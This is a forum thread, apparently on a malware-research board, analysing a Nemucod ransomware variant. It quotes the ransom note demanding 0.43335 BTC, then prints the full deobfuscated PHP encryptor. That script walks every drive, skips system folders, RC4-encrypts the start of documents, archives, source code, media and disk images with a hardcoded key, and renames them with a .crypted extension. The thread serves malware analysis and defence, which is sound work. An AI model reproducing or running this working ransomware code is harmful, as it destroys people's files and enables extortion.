xors wrote:Hello all,
The dropper is a wsf file. The dropper downloads two files, php4ts.dll and a file which will run a php file (a.php). It looks like the php file is doing the encryption. Some strings
Code: Select all- If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.
- It`s useless to reinstall Windows, update antivirus software, etc.
- Nobody can help you except us.
- You can find this manual on your desktop (DECRYPT.txt).
- Your files can be decrypted only after you make payment.
0.34008019
1. Create Bitcoin wallet here:
2. Buy 0.43335 BTC with cash, using search here:
3. Send 0.43335 BTC to this Bitcoin address:
4. Open one of the following links in your browser to download decryptor:
5. Run decryptor to restore your files.
All your documents, photos, databases and other important personal files
ATTENTION!
PLEASE REMEMBER:
To restore your files you have to pay 0.43335 BTC (bitcoins).
were encrypted using strong RSA-1024 algorithm with a unique key.
It's the last Nemucod ransomware PHP variant, the one which uses the RC4 encryption; The deobfuscated script below:
Code: Select all<?php set_time_limit(0);
ini_set("display_errors", "Off");
for ($i = 67;$i <= 90;$i++) if (is_dir(chr($i) . ":")) Tree(chr($i) . ":");
function Tree($p) {
$s = chr(92);
$k = base64_decode("MGCQXIq4mcz/0AQ48CBQIFCAiMD4gLDgueobOnOs");
$a = "e";
if (preg_match("/" . $s . $s . "(winnt|boot|system|windows|tmp|temp|program|appdata|application|roaming|msoffice|temporary|cache)/i", $p) || preg_match("/recycle/i", $p)) return;
$dp = opendir($p);
if ($dp === false) return;
while ($o = readdir($dp)) if ($o != "." && $o != "..") {
if (is_dir($p . $s . $o)) {
Tree($p . $s . $o);
} elseif ($a == "e" && preg_match("/[.](zip|rar|r00|r01|r02|r03|7z|tar|gz|gzip|arc|arj|bz|bz2|bza|bzip|bzip2|ice|xls|xlsx|doc|docx|pdf|djvu|fb2|rtf|ppt|pptx|pps|sxi|odm|odt|mpp|ssh|pub|gpg|pgp|kdb|kdbx|als|aup|cpr|npr|cpp|bas|asm|cs|php|pas|class|py|pl|h|vb|vcproj|vbproj|java|bak|backup|mdb|accdb|mdf|odb|wdb|csv|tsv|sql|psd|eps|cdr|cpt|indd|dwg|ai|svg|max|skp|scad|cad|3ds|blend|lwo|lws|mb|slddrw|sldasm|sldprt|u3d|jpg|jpeg|tiff|tif|raw|avi|mpg|mp4|m4v|mpeg|mpe|wmf|wmv|veg|mov|3gp|flv|mkv|vob|rm|mp3|wav|asf|wma|m3u|midi|ogg|mid|vdi|vmdk|vhd|dsk|img|iso)$/i", $o) || $a == "d" && preg_match("/[.](crypted)$/i", $o)) {
chmod($p . $s . $o, 0777);
$fp = fopen($p . $s . $o, "r+");
if ($fp !== false) {
$b = fread($fp, 2048);
$z = array();
for ($i = 0;$i < 256;$i++) $z[$i] = $i;
$j = 0;
for ($i = 0;$i < 256;$i++) {
$j = ($j + $z[$i] + ord($k[$i % strlen($k) ])) % 256;
$x = $z[$i];
$z[$i] = $z[$j];
$z[$j] = $x;
}
$i = 0;
$j = 0;
$c = "";
for ($y = 0;$y < strlen($b);$y++) {
$i = ($i + 1) % 256;
$j = ($j + $z[$i]) % 256;
$x = $z[$i];
$z[$i] = $z[$j];
$z[$j] = $x;
$c.= $b[$y] ^ chr($z[($z[$i] + $z[$j]) % 256]);
}
fseek($fp, 0);
fwrite($fp, $c);
fclose($fp);
if ($a == "e") {
rename($p . $s . $o, $p . $s . $o . ".crypted");
} else {
rename($p . $s . $o, preg_replace("/[.]crypted$/", "", $p . $s . $o));
}
}
}
}
closedir($dp);
}
BR,
Antelox
